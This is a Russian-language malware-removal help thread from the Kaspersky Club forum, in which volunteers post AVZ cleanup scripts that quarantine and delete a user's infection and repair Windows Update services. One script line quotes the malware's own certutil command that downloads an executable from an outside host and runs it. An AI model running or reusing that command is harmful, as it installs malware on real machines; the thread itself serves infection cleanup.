Перейти к содержанию
Правила раздела
20 лет клубу! Куда отправится Kaspersky Club? Нажми, чтобы узнать локацию! ;)

windefender.exe и Winmon.sys

auntmary

Автор auntmary
в Помощь в удалении вирусов

 Поделиться

Рекомендуемые сообщения

auntmary

auntmary

Опубликовано
Опубликовано

После скачивания программы с сомнительного ресурса (моя вина), обнаружилась гора вредоносного ПО на ноутбуке, баннеры, расширения браузера и тд., всё это я успешно почистила вручную и завершила дело сканированием с помощью Dr.Web Cureit, который нашел еще:
C:\Windows\windefender.exe 
C:\Windows\System32\drivers\WinmonFS.sys 
C:\Windows\System32\drivers\Winmon.sys 
\MSTask\csrss 

Однако, после перезагрузки файлы не удалились и в диспетчере задач я снова вижу все эти процессы, а по указанному пути их нет. они грузят систему, самой удалить не получается. помогите от них избавиться ?‍♀️

CollectionLog-2020.10.22-23.17.zip

regist

regist

Опубликовано
Опубликовано (изменено)

Трассировку маршрутов сами прописывали?

 

Закройте все программы, временно выгрузите антивирус, файрволл и прочее защитное ПО.

Выполните скрипт в АВЗ (Файл - Выполнить скрипт): 

{Исправление в службах в реестре, значения ImagePath.
Данный скрипт распространяется свободно и может быть модицифирован по согласованию с авторами - представителями SafeZone.cc
При публикации скрипта данный комментарий и ссылка на VirusNet.Info обязателена. }
var DescriptionTextWuauServ, DispayNameTextWuauServ, DescriptionTextBITS: String;
 DispayNameTextBITS, FullPathSystem32, NameFolderSystem32, FileServiceDll: String;
 ImagePathStr, RootStr, SubRootStr, LangID: string;
 AllRoots, AllKeys, RootsRestored, KeysRestored, KeysFixed: integer;
 FinishMsg, RestoreMsg, FixMsg, CheckMsg: String;
 RegSectMsg, ParamMsg, ParamValueMsg, InRegSectMsg, CorrectMsg, RestMsg: String;

procedure CheckAndRestoreSection(Root: String);
begin
 Inc(AllRoots);
 if RegKeyExistsEx('HKLM', Root) then
   RegKeyResetSecurity('HKLM', Root)
 else
  begin
    Inc(RootsRestored);
    RegKeyCreate('HKLM', Root);
    AddToLog(RegSectMsg + Root + RestMsg);
   end;
end;

procedure CheckAndRestoreSubSection;
begin
  CheckAndRestoreSection(SubRootStr);
end;

procedure RestoredMsg(Root, Param: String);
begin
  AddToLog(ParamMsg + Param + InRegSectMsg + Root + RestMsg);
  Inc(KeysRestored);
end;

procedure FixedMsg(Root, Param: String);
begin
  AddToLog(ParamValueMsg + Param + InRegSectMsg + Root + CorrectMsg);
  Inc(KeysFixed);
end;

procedure RestoreStrParam(Root, Param, Value: String);
begin
  RegKeyStrParamWrite('HKLM', Root, Param, Value);
  RestoredMsg(Root, Param);
end;

procedure CheckAndRestoreStrParam(Root, Param, Value: String);
begin
  Inc(AllKeys);
  if not RegKeyParamExists('HKLM', Root, Param) then
    RestoreStrParam(Root, Param, Value);
end;

procedure CheckAndRestoreIntParam(Root, Param: String; Value: Integer);
begin
 Inc(AllKeys);
 if not RegKeyParamExists('HKLM', Root, Param) then
  begin
    RegKeyIntParamWrite('HKLM', Root, Param, Value);
    RestoredMsg(Root, Param);
  end;
end;

procedure CheckAndRestoreMultiSZParam(Param, Value: String);
begin
 Inc(AllKeys);
 if not RegKeyParamExists('HKLM', RootStr, Param) then
  begin
    ExecuteFile('REG ADD HKLM\' + RootStr + ' /v ' + Param + Value, '', 0, 10000, true);
    RestoredMsg(RootStr, Param);
  end;
end;

// Исправление значения параметра ImagePath для служб 'wuauserv' и 'BITS'
procedure ImagePathFix(Node, Srv: String);
var RegStr: String;
begin
 RegStr := 'SYSTEM\' + Node + '\Services\' + Srv;
 if RegKeyExistsEx('HKLM', RegStr) then
  begin
    Inc(AllKeys);
    RegKeyResetSecurity('HKLM', RegStr);
    RegKeyStrParamWrite('HKLM', RegStr, 'ImagePath', ImagePathStr);
    FixedMsg(RegStr, 'ImagePath');
  end;
end;

{ Выполнение исправление всех ключей в ветках -
   'HKLM\SYSTEM\CurrentControlSet\Services\BITS' и 'HKLM\SYSTEM\CurrentControlSet\Services\wuauserv'}
procedure CorrectRegistryRoot(DescriptionText, DisplayNameText, Srv: String);
var FileServiceDll, CCSNumber: string;
     i : integer;
begin
 if Srv = 'BITS' then
   FileServiceDll := FullPathSystem32 + 'qmgr.dll'
 else
   FileServiceDll := FullPathSystem32 + 'wuauserv.dll';
 RootStr:= 'SYSTEM\CurrentControlSet\Services\' + Srv;

 CheckAndRestoreSection(RootStr);

 CheckAndRestoreStrParam(RootStr, 'Description', DescriptionText);
 CheckAndRestoreStrParam(RootStr, 'DisplayName', DisplayNameText);
 CheckAndRestoreStrParam(RootStr, 'ObjectName', 'LocalSystem');

 Inc(AllKeys);
 if not RegKeyParamExists('HKLM', RootStr, 'ImagePath') then
   RestoreStrParam(RootStr, 'ImagePath', ImagePathStr)
 else
  begin
    Dec(AllKeys);
    if LowerCase(RegKeyStrParamRead('HKLM', RootStr, 'ImagePath')) <> LowerCase(ImagePathStr) then
      for i:= 0 to 999 do
       begin
         if i > 0 then
           CCSNumber := FormatFloat('ControlSet000', i)
         else
           CCSNumber := 'CurrentControlSet';
         ImagePathFix(CCSNumber, Srv);
      end;
   end;

 CheckAndRestoreIntParam(RootStr, 'ErrorControl', 1);
 CheckAndRestoreIntParam(RootStr, 'Start', 2);
 CheckAndRestoreIntParam(RootStr, 'Type', 32);

 if Srv = 'BITS' then
  begin
    CheckAndRestoreMultiSZParam('DependOnService', ' /t REG_MULTI_SZ /d RpcSs');
    CheckAndRestoreMultiSZParam('DependOnGroup', ' /t REG_MULTI_SZ');
  end;

 SubRootStr:= RootStr + '\Enum';
 CheckAndRestoreSubSection;

 CheckAndRestoreStrParam(SubRootStr, '0', 'Root\LEGACY_' + UpperCase(Srv) + '\0000');
 CheckAndRestoreIntParam(SubRootStr, 'Count', 1);
 CheckAndRestoreIntParam(SubRootStr, 'NextInstance', 1);

 SubRootStr := RootStr + '\Security';
 CheckAndRestoreSubSection;

 Inc(AllKeys);
 if not RegKeyParamExists('HKLM', SubRootStr, 'Security') then
  begin
    RegKeyBinParamWrite('HKLM', SubRootStr, 'Security', '01,00,14,80,78,00,00,00,84,00,00,00,14,00,00,00,30,00,00,00,02,00,1c,00,01,00,00,00,02,80,14,00,ff,00,0f,00,01,01,00,00,00,00,00,01,00,00,00,00,02,00,48,00,03,00,00,00,00,00,14,00,9d,00,02,00,01,01,00,00,00,00,00,05,0b,00,00,00,00,00,18,00,ff,01,0f,00,01,02,00,00,00,00,00,05,20,00,00,00,20,02,00,00,00,00,14,00,ff,01,0f,00,01,01,00,00,00,00,00,05,12,00,00,00,01,01,00,00,00,00,00,05,12,00,00,00,01,01,00,00,00,00,00,05,12,00,00,00');
    RestoredMsg(SubRootStr, 'Security');
  end;

 SubRootStr:= RootStr + '\Parameters';
 CheckAndRestoreSubSection;

 Inc(AllKeys);
 if not RegKeyParamExists('HKLM', SubRootStr, 'ServiceDll') then
  begin
    RegKeyParamWrite('HKLM', SubRootStr, 'ServiceDll', 'REG_EXPAND_SZ', FileServiceDll);
    RestoredMsg(SubRootStr, 'ServiceDll');
  end
 else if LowerCase(RegKeyStrParamRead('HKLM', SubRootStr, 'ServiceDll')) <> LowerCase(FileServiceDll) then
  begin
    RegKeyParamWrite('HKLM', SubRootStr, 'ServiceDll', 'REG_EXPAND_SZ', FileServiceDll);
    FixedMsg(SubRootStr, 'ServiceDll');
  end
end;

{ Главное выполнение }
begin
ExecuteFile('net.exe', 'stop tcpip /y', 0, 15000, true);
 TerminateProcessByName('c:\windows\rss\csrss.exe');
 TerminateProcessByName('c:\users\mistress\appdata\local\temp\csrss\u20200626.exe');
 TerminateProcessByName('c:\users\mistress\appdata\local\temp\csrss\ww24.exe');
 QuarantineFile('c:\windows\rss\csrss.exe', '');
 QuarantineFile('c:\users\mistress\appdata\local\temp\csrss\u20200626.exe', '');
 QuarantineFile('c:\users\mistress\appdata\local\temp\csrss\ww24.exe', '');
 QuarantineFile('C:\Windows\Temp\kjmGSURZTYOfniSI\wyHjuFAighgBsSf\bakxgxh.exe', '');
 QuarantineFile('C:\Users\mistress\AppData\Local\Temp\csrss\scheduled.exe', '');
 QuarantineFile('C:\Users\mistress\appdata\local\temp\csrss\wup\xarch\wup.exe', '');
 DeleteFile('c:\windows\rss\csrss.exe', '');
 DeleteFile('c:\users\mistress\appdata\local\temp\csrss\u20200626.exe', '');
 DeleteFile('c:\users\mistress\appdata\local\temp\csrss\ww24.exe', '');
 DeleteFile('C:\Windows\rss\csrss.exe', '32');
 DeleteFile('C:\Windows\rss\csrss.exe', '64');
 DeleteFile('C:\Windows\Temp\kjmGSURZTYOfniSI\wyHjuFAighgBsSf\bakxgxh.exe', '32');
 DeleteFile('cmd.exe  /C certutil.exe -urlcache -split -f https://babsitef.com/app/app.exe C:\Users\mistress\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\mistress\AppData\Local\Temp\csrss\scheduled.exe /31340', '64');
 DeleteFile('C:\Users\mistress\AppData\Local\Temp\csrss\scheduled.exe', '64');
 DeleteFile('C:\Windows\Temp\kjmGSURZTYOfniSI\wyHjuFAighgBsSf\bakxgxh.exe', '64');
 DeleteFile('C:\Users\mistress\appdata\local\temp\csrss\scheduled.exe', '');
 DeleteFile('C:\Users\mistress\appdata\local\temp\csrss\wup\xarch\wup.exe', '');
 ClearLog;
 ExpRegKey('HKLM', 'SYSTEM\CurrentControlSet\Services\wuauserv', 'wuauserv.reg');
 ExpRegKey('HKLM', 'SYSTEM\CurrentControlSet\Services\BITS', 'BITS.reg');
 LangID:= RegKeyStrParamRead('HKLM', 'SYSTEM\CurrentControlSet\Control\Nls\Language', 'InstallLanguage');
 if LangID = '0419' then
  begin
    DescriptionTextWuauServ := 'Включает загрузку и установку обновлений Windows. Если служба отключена, то на этом компьютере нельзя будет использовать возможности автоматического обновления или веб-узел Центра обновления Windows.';
    DispayNameTextWuauServ := 'Автоматическое обновление';
    DescriptionTextBITS := 'Обеспечивает передачу данных между клиентами и серверами в фоновом режиме. Если служба BITS отключена, такие возможности, как Windows Update, не могут правильно работать.';
    DispayNameTextBITS := 'Фоновая интеллектуальная служба передачи (BITS)';
    AddToLog('Операционная система - русская');
    FinishMsg := '–––– Восстановление завершено ––––';
    RestoreMsg := 'Восстановлено разделов\параметров: ';
    FixMsg := 'Исправлено параметров: ';
    CheckMsg := 'Проверено разделов\параметров: ';
    RegSectMsg := 'Раздел реестра HKLM\';
    ParamMsg := 'Параметр ';
    ParamValueMsg := 'Значение параметра ';
    InRegSectMsg := ' в разделе реестра HKLM\';
    CorrectMsg := ' исправлено на оригинальное.';
    RestMsg := 'восстановлен.';
  end
 else
  begin
    DescriptionTextWuauServ := 'Enables the download and installation of Windows updates. If this service is disabled, this computer will not be able to use the Automatic Updates feature or the Windows Update Web site.';
    DispayNameTextWuauServ := 'Automatic Updates';
    DescriptionTextBITS := 'Transfers data between clients and servers in the background. If BITS is disabled, features such as Windows Update will not work correctly.';
    DispayNameTextBITS := 'Background Intelligent Transfer Service';
    AddToLog('Operation system - english');
    FinishMsg := '–––– Restoration finished ––––';
    RestoreMsg := 'Sections\parameters restored: ';
    FixMsg := 'Parameters corrected: ';
    CheckMsg := 'Sections\parameters checked: ';
    RegSectMsg := 'Registry section HKLM\';
    ParamMsg := 'Parameter ';
    ParamValueMsg := 'Value of parameter ';
    InRegSectMsg := ' in registry section HKLM\';
    CorrectMsg := ' corrected on original.';
    RestMsg := ' restored.';
  end;
 AddToLog('');

{ Определение папки X:\Windows\System32\ }
 NameFolderSystem32 := RegKeyStrParamRead('HKLM', 'SYSTEM\CurrentControlSet\Control\Windows', 'SystemDirectory');
 ImagePathStr := NameFolderSystem32 + '\svchost.exe -k netsvcs';
 Delete(NameFolderSystem32, 1, pos('\', NameFolderSystem32) - 1);
 FullPathSystem32 := GetEnvironmentVariable('WinDir') + NameFolderSystem32 + '\';

 AllRoots := 0;
 AllKeys := 0;
 RootsRestored := 0;
 KeysRestored := 0;
 KeysFixed := 0;

 CorrectRegistryRoot(DescriptionTextBITS, DispayNameTextBITS, 'BITS');
 CorrectRegistryRoot(DescriptionTextWuauServ, DispayNameTextWuauServ, 'wuauserv');

 AddToLog('');
 AddToLog(FinishMsg);
 AddToLog('');
 AddToLog(RestoreMsg + IntToStr(RootsRestored) + ' \ ' + IntToStr(KeysRestored));
 AddToLog(FixMsg + IntToStr(KeysFixed));
 AddToLog(CheckMsg + IntToStr(AllRoots) + ' \ ' + IntToStr(AllKeys));
 SaveLog(RegKeyStrParamRead('HKEY_CURRENT_USER', 'Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders', 'Desktop') + '\Correct_wuauserv&BITS.log');
 TerminateProcessByName('c:\users\mistress\appdata\local\temp\csrss\ww24.exe');
 TerminateProcessByName('c:\users\mistress\appdata\roaming\b9cdde3b480f\b9cdde3b480f.exe');
 TerminateProcessByName('c:\windows\rss\csrss.exe');
 QuarantineFile('c:\users\mistress\appdata\local\temp\csrss\ww24.exe', '');
 QuarantineFile('c:\windows\rss\csrss.exe', '');
 QuarantineFile('C:\Windows\windefender.exe', '');
 QuarantineFileF('c:\users\mistress\appdata\local\temp\csrss', '*.exe, *.dll, *.sys, *.bat, *.vbs, *.ps1, *.js*, *.tmp*', true, '', 0, 0);
 QuarantineFileF('c:\users\mistress\appdata\roaming\b9cdde3b480f', '*.exe, *.dll, *.sys, *.bat, *.vbs, *.ps1, *.js*, *.tmp*', true, '', 0, 0);
 DeleteFile('c:\users\mistress\appdata\local\temp\csrss\ww24.exe', '32');
 DeleteFile('c:\windows\rss\csrss.exe', '32');
 DeleteFile('C:\Windows\windefender.exe', '32');
 DeleteFileMask('c:\users\mistress\appdata\local\temp\csrss', '*', true);
 DeleteFileMask('c:\users\mistress\appdata\roaming\b9cdde3b480f', '*', true);
 DeleteDirectory('c:\users\mistress\appdata\local\temp\csrss');
 DeleteDirectory('c:\users\mistress\appdata\roaming\b9cdde3b480f');
 DeleteSchedulerTask('csrss');
 DeleteSchedulerTask('ScheduledUpdate');
 DeleteSchedulerTask('ScheduledUpdate');   DeleteSchedulerTask('YjuvlbImHgDMaWtHI.job');
 DeleteSchedulerTask('YjuvlbImHgDMaWtHI');
 RegKeyParamDel('HKEY_CURRENT_USER', 'Software\Microsoft\Windows\CurrentVersion\Run', 'BlueBird', '32');
 RegKeyParamDel('HKEY_CURRENT_USER', 'Software\Microsoft\Windows\CurrentVersion\Run', 'BlueBird', '64');
 RegKeyParamDel('HKEY_CURRENT_USER', 'Software\Microsoft\Windows\CurrentVersion\Run', 'BlueBird', 'x32');
 RegKeyParamDel('HKEY_CURRENT_USER', 'Software\Microsoft\Windows\CurrentVersion\Run', 'BlueBird', 'x64');
 RegKeyParamDel('HKEY_CURRENT_USER', 'Software\Microsoft\Windows\CurrentVersion\Run', 'CloudNet', 'x64');
 RegKeyIntParamWrite('HKCU', 'Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\', '1001', 1);
 RegKeyIntParamWrite('HKCU', 'Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\', '1004', 3);
 RegKeyIntParamWrite('HKCU', 'Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\', '1201', 3);
 RegKeyIntParamWrite('HKCU', 'Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\', '1804', 1);
 RegKeyIntParamWrite('HKCU', 'Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\', '2201', 3);
 CreateQurantineArchive(GetAVZDirectory + 'quarantine.zip');
ExecuteSysClean;
 ExecuteRepair(3);
 ExecuteRepair(4);
 ExecuteWizard('SCU', 2, 3, true);
RebootWindows(true);
end.

 

Компьютер перезагрузится.

 

Полученный архив quarantine.zip из папки с распакованной утилитой AVZ на этот почтовый ящик: newvirus@kaspersky.com[

 

 

 

Для повторной диагностики запустите снова AutoLogger. В первом диалоговом окне нажмите "ОК", удерживая нажатой клавишу "Shift".

Изменено пользователем regist
  • Like (+1) 1
auntmary

auntmary

Опубликовано
  • Автор
Опубликовано
17 часов назад, regist сказал:

Трассировку маршрутов сами прописывали?

Доброй ночи, нет, я ничего не прописывала

17 часов назад, regist сказал:

Выполните скрипт в АВЗ (Файл - Выполнить скрипт):

скрипт не хочет работать или я что-то не так делаю

Ошибка скрипта: ')' expected, позиция [278:2]
Ошибка скрипта: Undeclared identifier: 'DeleteSchedulerTask', позиция [253:21]

 

прошу прощения, все сработало (изначально запускала АВЗ не из автологгера)
после перезагрузки всё чисто, насколько я могу сейчас судить, спасибо большое ?
прикрепляю логи повторной диагностики

  

CollectionLog-2020.10.23-00.36.zip

Sandor

Sandor

Опубликовано
Опубликовано

После выполнения скрипта на рабочем столе должен был появится текстовый файл Correct_wuauserv&BITS.log. Прикрепите его к следующему сообщению.
 

auntmary

auntmary

Опубликовано
  • Автор
Опубликовано
8 часов назад, Sandor сказал:

После выполнения скрипта на рабочем столе должен был появится текстовый файл Correct_wuauserv&BITS.log. Прикрепите его к следующему сообщению.
 

Здравствуйте, после скрипта этот файл не появился, только quarantine.zip, который я отправила на указанный адрес 

regist

regist

Опубликовано
Опубликовано
23 часа назад, auntmary сказал:

скрипт не хочет работать или я что-то не так делаю

Ошибка скрипта: ')' expected, позиция [278:2]

Поправил, попробуйте ещё раз.

auntmary

auntmary

Опубликовано
  • Автор
Опубликовано
23.10.2020 в 23:40, regist сказал:

Поправил, попробуйте ещё раз.

 

снова здравствуйте, только сейчас заметила последствия вируса, а именно невозможно открыть дискорд на компьютере и переустановить его так же не выходит, есть ли решение у этой проблемы?

 

при попытке установить дискорд выдает 

image.png.6c4af4789d2bff6db3a735ff486b3db3.png

 

23.10.2020 в 08:23, Sandor сказал:

После выполнения скрипта на рабочем столе должен был появится текстовый файл Correct_wuauserv&BITS.log. Прикрепите его к следующему сообщению.
 

только сейчас заметила, что файл появился на рабочем столе второй учетной записи!

Correct_wuauserv&BITS.log

Sandor

Sandor

Опубликовано
Опубликовано

Ещё раз, пожалуйста, соберите свежий CollectionLog.

Дополнительно:

  • Скачайте AdwCleaner (by Malwarebytes) и сохраните его на Рабочем столе.
  • Запустите его (необходимо запускать через правую кн. мыши от имени администратора), нажмите кнопку "Scan" ("Запустить проверку") и дождитесь окончания сканирования.
  • Когда сканирование будет завершено, отчет будет сохранен в следующем расположении: C:\AdwCleaner\Logs\AdwCleaner[Sxx].txt (где x - любая цифра).
  • Прикрепите отчет к своему следующему сообщению.

Подробнее читайте в этом руководстве.
 

regist

regist

Опубликовано
Опубликовано
22.10.2020 в 21:02, regist сказал:

Полученный архив quarantine.zip из папки с распакованной утилитой AVZ на этот почтовый ящик: newvirus@kaspersky.com[

 

Для повторной диагностики запустите снова AutoLogger. В первом диалоговом окне нажмите "ОК", удерживая нажатой клавишу "Shift".

То есть заново отправьте карантин.  И жду лога Автологера.

 

5 часов назад, auntmary сказал:

файл появился на рабочем столе второй учетной записи!

Он появляется в той учётной записи в которой выполняли скрипт. Логи собирать и скрипты выполнять надо в одной учётной записи, а не в разных.

auntmary

auntmary

Опубликовано
  • Автор
Опубликовано
26.10.2020 в 09:06, Sandor сказал:

Ещё раз, пожалуйста, соберите свежий CollectionLog.

Дополнительно:

 

  • Скачайте AdwCleaner (by Malwarebytes) и сохраните его на Рабочем столе.
  • Запустите его (необходимо запускать через правую кн. мыши от имени администратора), нажмите кнопку "Scan" ("Запустить проверку") и дождитесь окончания сканирования.
  • Когда сканирование будет завершено, отчет будет сохранен в следующем расположении: C:\AdwCleaner\Logs\AdwCleaner[Sxx].txt (где x - любая цифра).
  • Прикрепите отчет к своему следующему сообщению.

 

Подробнее читайте в этом руководстве.
 

 

все сделала, вот логи. эх снова те же вирусы ? 
 

AdwCleaner[C00].txt AdwCleaner[S00].txt

 

26.10.2020 в 10:45, regist сказал:

То есть заново отправьте карантин.  И жду лога Автологера.

 

Он появляется в той учётной записи в которой выполняли скрипт. Логи собирать и скрипты выполнять надо в одной учётной записи, а не в разных.


я все делала в своей учетной записи, просто я её когда то не совсем правильно переименовала (у меня руки не совсем из того места выросли) и логи оказались в пустой папке с прошлым именем пользователя. мне все равно стоит всё проделать заново?

Sandor

Sandor

Опубликовано
Опубликовано
3 часа назад, auntmary сказал:

всё проделать заново?

Соберите повторно CollectionLog Автологером.

regist

regist

Опубликовано
Опубликовано
15 часов назад, auntmary сказал:

AdwCleaner[C00].txt

разве кто-то просил вас удалять найденное?

 

15 часов назад, auntmary сказал:

мне все равно стоит всё проделать заново?

Надо делать только то, что просят

26.10.2020 в 07:45, regist сказал:

заново отправьте карантин.  И жду лога Автологера.

 

regist

regist

Опубликовано
Опубликовано (изменено)

1) Закройте все программы, временно выгрузите антивирус, файрволл и прочее защитное ПО.

2) Скачайте этот архив. Запустите рег-файлы из архива и согласитесь на внесение изменений в реестр.

3) Выполните скрипт в АВЗ (Файл - Выполнить скрипт): 

begin
 ClearQuarantineEx(true);
 QuarantineFile('C:\Program Files (x86)\xduJFODYU\nZWnqg.dll', '');
 DeleteFile('C:\Program Files (x86)\xduJFODYU\nZWnqg.dll', '64');
 DeleteSchedulerTask('{7F9FD259-8224-4672-BBA9-DBA84C2F0B3A}');
 DeleteSchedulerTask('lAdMHZBqUcXIeKJ');
 DeleteSchedulerTask('Lenovo\Lenovo Service Bridge\S-1-5-21-3833064128-939169056-4125991240-1001');
 DeleteSchedulerTask('TVT\TVSUUpdateTask_UserLogOn');
 DelCLSID('OpenVPN_UserSetup');
ExecuteSysClean;
 ExecuteRepair(20);
RebootWindows(true);
end.

 

Компьютер перезагрузится.

 

4)

- Перетащите лог Check_Browsers_LNK.log из папки AutoLogger\CheckBrowsersLNK на утилиту ClearLNK. Отчёт о работе прикрепите.

 

5) Запустите снова AutoLogger, соберите и прикрепите свежие логи.

Изменено пользователем regist

Пожалуйста, войдите, чтобы комментировать

Вы сможете оставить комментарий после входа в



Войти
 Поделиться
Перейти к списку тем

  • Похожий контент

    • sxhwre
      Очень сильно просел интернет, маленькая скорость загрузки, предполагаю что у меня вирус
      Автор sxhwre
      CollectionLog-2026.06.06-23.09.zip
      забыл более подробно написать о проблеме, как бы стыдно щас не было но это началось после того как я скачал игру с интернета
    • Zhenya__
      Ноутбук на 10-15 секунд, раз в 3-4 минуты глючит. На постоянной основе немного глючит
      Автор Zhenya__
      WinDef пожаловался на это Trojan:Win32/Malgent!MSR. Я решил обратиться за помощью сюда и узнать как его удалить, нашёл инструкцию по тому как обращаться, скачал программу и проверил ноутбук. Трояна он не нашёл, но нашёл что то другое, и когда я нажал на удалить всё зависло минут на 5 и ноут выключился. После всего этого ноут тупит, прогу не могу найти, а инструкция пропала. Про троян - WinDef его удалял, но он снова появлялся. Каюсь, хотел скачать чит на роблокс, это и есть Xeno(качал с официального сайта)

    • Altair Studio
      Компьютер жестко виснет и пропадает инет, как будто агент ИИ работает
      Автор Altair Studio
      Добрый день.
      Месяца 2 борюсь с явным умышленным проникновением ко мпен в локальную сеть и ПК. То интернет пропадет то какие то непонятные траблы с учетными записями да много всего не упомнишь, операционку менял раза 4 как будто в сам биос перепрошили программу или я не знаю как. 
      CollectionLog-2026.06.03-06.46.zip
    • Golem555
      Компьютер начал сильно загружаться
      Автор Golem555
      Компьютер опять начал сильно загружаться, просматривал на что уходит мощность и афигел
      CollectionLog-2026.06.01-20.25.zip
    • Инс
      Вирус перемещает случайные файлы в TMP, а потом удаляет
      Автор Инс
      Суть:
      - вирусняк переносит случайные файлы, надёрганные отовсюду кластерами, в папку Тmp(папка временных файлов винды из настроек переменных сред), а оттуда уже удаляет через какое-то время(~минута), прям в реалтайме
      - в автозагрузке пусто
      - планировщик заданий чистый(единственно задачи винды не песочил)
      - в системных службах тоже ничего подозрительного
      - диспетчер задач ничего опасного не показывает
      - двеб и касперский ничего не находят, касперский вообще никак не реагирует на то что прям при нём файлы куда-то перемещаются и удаляются
      - вирус запускается сам по себе непонятно от чего, но 100% запуск если включить поиск по диску, например "дата создания ‎25.‎05.‎2026"
      - при этом в первую очередь удаляет игры, папки мод и сохранки (бедный Зомбоид, который я последний раз запускал лет 5 назад, раздербанил почти в 0)
      Что это вообще такое?
       
      Вин7, установлена лет 10 как, всякое было, но чтоб вот так - первый раз. Я подобное видел только на ХП, думал что на Вин7 нельзя просто вот взять и поудалять чё хошь, без желания пользователя.
      Пока что заблокировал удаление тем что убрал запись в папке Tmp, вирус стучится туда(видно про монитору ресурсов диспетчера), но не может удалить файлы.
      Прежде чем заметил не знаю сколько всего удалило вирусом, но точно на моих глазах он удалил на 3гб, прежде чем я окончательно сообразил что происходит, заметил вообще потому что он удалил несколько ярлыков с рабочего стола и я пошёл искать что это такое.
      CollectionLog-2026.05.25-14.44.zip
×
×
  • Создать...